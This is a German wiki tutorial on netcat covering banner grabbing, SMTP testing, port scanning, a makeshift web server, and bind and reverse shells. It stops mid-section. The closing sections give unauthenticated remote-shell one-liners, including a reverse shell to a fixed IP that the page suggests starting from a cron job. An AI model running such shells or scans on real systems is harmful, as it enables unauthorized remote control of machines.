Inhaltsverzeichnis

netcat

NetzKatze oder das Schweizer-Taschenmesser des Netzwerkadministrators…

NetCat (nc) ist ein kleines universelles Werkzeug im Netzwerkbereich. Analog zu cat erlaubt NetCat das lesen -aber auch- von und in Netzwerkverbindungen.
Es gibt verschiedene Implementierungen von NetCat (gnu-netcat, netcat6, openbsd-netcat,nc für Windows,…). Diese unterscheiden sich teilweise in den verfügbaren Optionen und Fähigkeiten

Servertest

Besonders zum Testen (oder zum Bannergrabbing) eignet sich NetCat hervorragend:
echo -e 'GET / HTTP/1.1\r\nHost: wiki.butzel.net\r\n\r' | nc git.butzel.net 80

Dies gilt natürlich nicht nur für HTTP, sondern auch für andere Protokolle

echo -en "EHLO domain.tld\r\nMAIL FROM: ich@domain.tld\r\nRCPT TO:du@other.domain\r\nDATA\r\nSubject: Betreff\r\n\r\nMailtext. Blah laber fasel...\r\n\r\n.\r\nquit\r\n" | nc smtp.server.local 25

Telnet

nc -t <ip> 23 oder
nc -C <ip> 23
Parameter:

Beispiele:

Port-Scan

Auch als Port-Scanner lässt sich NetCat verwenden: nc -vvznw 1 <ip> <port>
Parameter:

Beispiel-Script für mehrere IP-Adressen

## gegeben sei eine Text-Datei 'ips.txt' mit  einer IP-Adresse je Zeile
while read IP
do
 nc -nvvzw 1 $IP 20-25,80,443,8080,8443 
done<ips.txt

Listener (Server)

nc -lp <port> oder
nc -l <ip> <port>
Parameter:

Web-Server

Dank des Listeners kann NetCat auch einen simplen WebServer repäsentieren:

Ausgabe einer statischen Webseite:

## Vorbereitungen zur Erstellung einer einfachen Seite mit Header
# Webseite:
echo "<html><head><title>Beispiel</title></head><body>Beispiel-Seite mit NetCat</body></html>" >> index.html
# HTTP-Header:
echo -en "HTTP/1.1 200 OK\r\nContent-Length: $(cat index.html|wc -c)\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\n\r\n" > index.http
# Zusammenführen 
cat index.html >> index.http && rm index.html 
 
## Webserver mit Netcat
while true; do nc -lp 80 < index.http ; done

Beispiel einer 'unsauberen' Umleitung nach www.butzel.info

REDIR="http://www.butzel.info"
REDIR="<html><head><meta http-equiv=\"refresh\" content=\"0; URL=$REDIR\"><title>Weiterleitung zu: $REDIR</title></head><body><h2>Weiterleitung zu:</h2><h1><a href=$REDIR>$REDIR</a></h1></body></html>"
REDIR="HTTP/1.1 200 OK\r\nContent-Length: $(echo $REDIR|wc -c)\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\n\r\n$REDIR"
while true; do echo -en $REDIR|nc -lp 80 -w 5 &>/dev/null ; done                                                               

Remote Shell

NetCat kann auch als Remote-Shell verwendet werden:
nc -lp 4711 -e /bin/bash

Beispiel:

  1. im ersten Terminal: nc -lp 4711 -e /bin/bash
  2. in einem weiteren Terminal: nc 127.0.0.1 4711
  3. verwenden von Befehlen wie:
    • ls
    • whoami
    • cat /etc/passwd oder exit

Dies funktioniert natürlich auch auf unterschiedlichen Computern. Die Befehle werden immer mit dem Nutzerrechten ausgeführt, der den Parameter -e (bzw. -c) verwendete (vergl. whoami). Eine Authentifizierung wird hier nicht benötigt und findet nicht statt!

Reverse Shell

Natürlich lässt sich dies auch umkehren - als sogenannte Reverse Shell. Wenn z.B. das fernzusteuernde System in einem "NAT-Netzwerk„ liegt:

  1. auf dem lokalen System (IP: 31.80.26.3) den Listener starten nc -lp 3011
  2. auf dem remote System die Verbindung initieren (z.B. via Cron-Job) nc 31.80.26.3 3011 -e /bin/bash


Einschränkungen

weder -e noch -c

Es gibt jedoch auch einige Implementierungen welche - aus Sicherheitsgründen - diese Parameter -e oder -c nicht zur Verfügung stellen.
Aber auch hier gibt es Möglichkeiten (aus der Manpage man nc )